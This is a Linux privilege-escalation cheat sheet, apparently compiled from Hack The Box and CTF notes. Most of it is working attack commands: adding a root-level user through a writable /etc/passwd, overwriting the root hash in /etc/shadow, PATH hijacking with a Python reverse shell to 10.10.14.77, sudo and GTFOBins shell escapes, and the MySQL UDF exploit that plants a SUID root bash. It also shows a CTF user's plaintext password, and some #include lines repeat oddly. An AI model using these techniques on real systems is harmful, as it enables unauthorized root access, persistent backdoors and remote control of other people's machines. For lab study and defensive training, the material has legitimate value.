Elevation of Privileges - EoP

Privilege Escalation

Attack vectors

Scripts

SUID/SGID

find / -perm -u=s -type f 2>/dev/null

# Find files with SUID configured
find / -perm 4755

# Find all the SUID/SGID executables 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Cronjob

cat /etc/crontab
crontab -l # user cronjobs
sudo crontab -l # root cronjobs

Writable files

/etc/passwd writable

Create a password hash: openssl passwd -1 -salt [salt] [password] Ex: openssl passwd -1 -salt new 123 $1$new$p7ptkEKU1HnaHpRtzNizS1
Add an new entry to /etc/passwd : Ex: new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Switch to the new user su new password: 123 id uid=0(new) gid=0(root) groups=0(root)

Editing /etc/passwd File for Privilege Escalation - Hacking ArticlesHacking Articles

/etc/shadow writable

Generate a new password hash with a password of your choice: mkpasswd -m sha-512 newpasswordhere
Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.
Switch to the root user, using the new password:
su root

Path

Example 1

2019/10/08 10:56:02 CMD: UID=0    PID=2689   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

# PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

jkr@writeup:~$ which run-parts
/bin/run-parts

#
jkr@writeup:~$ cp perl-reverse-shell.pl run-parts
jkr@writeup:~$ ls
perl-reverse-shell.pl  run-parts  user.txt
jkr@writeup:~$ mv run-parts /usr/local/sbin

Ref: HTB - Write-Up

Example 2

# file weak_c.c

#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
 
int main(void)
{
    setreuid(geteuid(), geteuid());
    system("ls /path/to/secret/.file");
    return 0;
}

$ which cat
/bin/cat
cp /bin/cat /tmp/ls
$ export PATH=/tmp/:$PATH
$ ./weak_c

Example 3

theseus@ubuntu:/tmp/poc$ nano fdisk
theseus@ubuntu:/tmp/poc$ cat fdisk
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
theseus@ubuntu:/tmp/poc$ chmod 777 fdisk
theseus@ubuntu:/tmp/poc$ export PATH=/tmp/poc:$PATH
theseus@ubuntu:/tmp/poc$ /bin/sysinfo

Sudo version

Sudo < 1.8.28

sudo 1.8.27 - Security BypassExploit Database

Sudo < 1.9.5p2 - CVE-2021-3156: Heap-Based Buffer Overflow

Debian 10 (Sudo 1.8.27)

GitHub - 0xdevil/CVE-2021-3156: CVE-2021-3156: Sudo heap overflow exploit for Debian 10GitHub

Ubuntu 20.04 (Sudo 1.8.31)

GitHub - CptGibbon/CVE-2021-3156: Root shell PoC for CVE-2021-3156GitHub

sudo -l - No password

luvit - lua


User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit
$ 

#Exploitation
webadmin@traceback:/etc/update-motd.d$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
<n /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
sysadmin@traceback:/etc/update-motd.d$

(ALL : ALL) ALL

technawi@Jordaninfosec-CTF01:~$ sudo -l
sudo -l
[sudo] password for technawi: 3vilH@ksor

Matching Defaults entries for technawi on Jordaninfosec-CTF01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User technawi may run the following commands on Jordaninfosec-CTF01:
    (ALL : ALL) ALL
    
technawi@Jordaninfosec-CTF01:~$ sudo su
sudo su
root@Jordaninfosec-CTF01:/home/technawi# cd /root  
cd /root

Bad Permissions - writable files

2020/03/15 09:27:45 CMD: UID=0    PID=10959  | run-parts --lsbsysinit /etc/update-motd.d 

webadmin@traceback:/etc/update-motd.d$ ls -la
ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Jul 29 00:30 00-header
-rwxrwxr-x  1 root sysadmin  982 Jul 29 00:30 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Jul 29 00:30 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Jul 29 00:30 80-esm
-rwxrwxr-x  1 root sysadmin  299 Jul 29 00:30 91-release-upgrade

# rWx
sysadmin@traceback:/etc/update-motd.d$ echo "cat /root/root.txt" >> 00-header
echo "cat /root/root.txt" >> 00-header
sysadmin@traceback:/etc/update-motd.d$

NFS Misconfiguration

NFS no_root_squash/no_all_squash misconfiguration PEHackTricks

Linux Privilege Escalation using Misconfigured NFS - Hacking ArticlesHacking Articles

Exploiting NFS share [updated 2021] - Infosec ResourcesInfosec Resources

ShellShock - Bash < 4.3

bash --version
GNU bash, version 4.2.46(2)-release (x86_64-redhat-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Practical Shellshock exploitation – Part 1 - Infosec ResourcesInfosec Resources

MySQL

The MySQL service is running as root

 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 
 # 1 - id
 
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 
 # 2- /bin/bash
 
 * mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
 * mysql> exit
 * /tmp/rootbash -p

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)Exploit Database

GTFOBins

Vi

sudo vi
:!sh

More -> Vim

Réduire la taille du terminal au maximum pour piéger More. Quand dans More appuyer sur v pour entrer dans VIM

Dans vim
:set shell=/bin/sh
:shell

vim | GTFOBins

Nano

./nano
^R^X
reset; sh 1>&0 2>&0

nano | GTFOBins

HTB - OpenAdmin0xSs0rZ

Find

find . -exec /bin/sh -p \; -quit`

find | GTFOBins

Journalctl

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls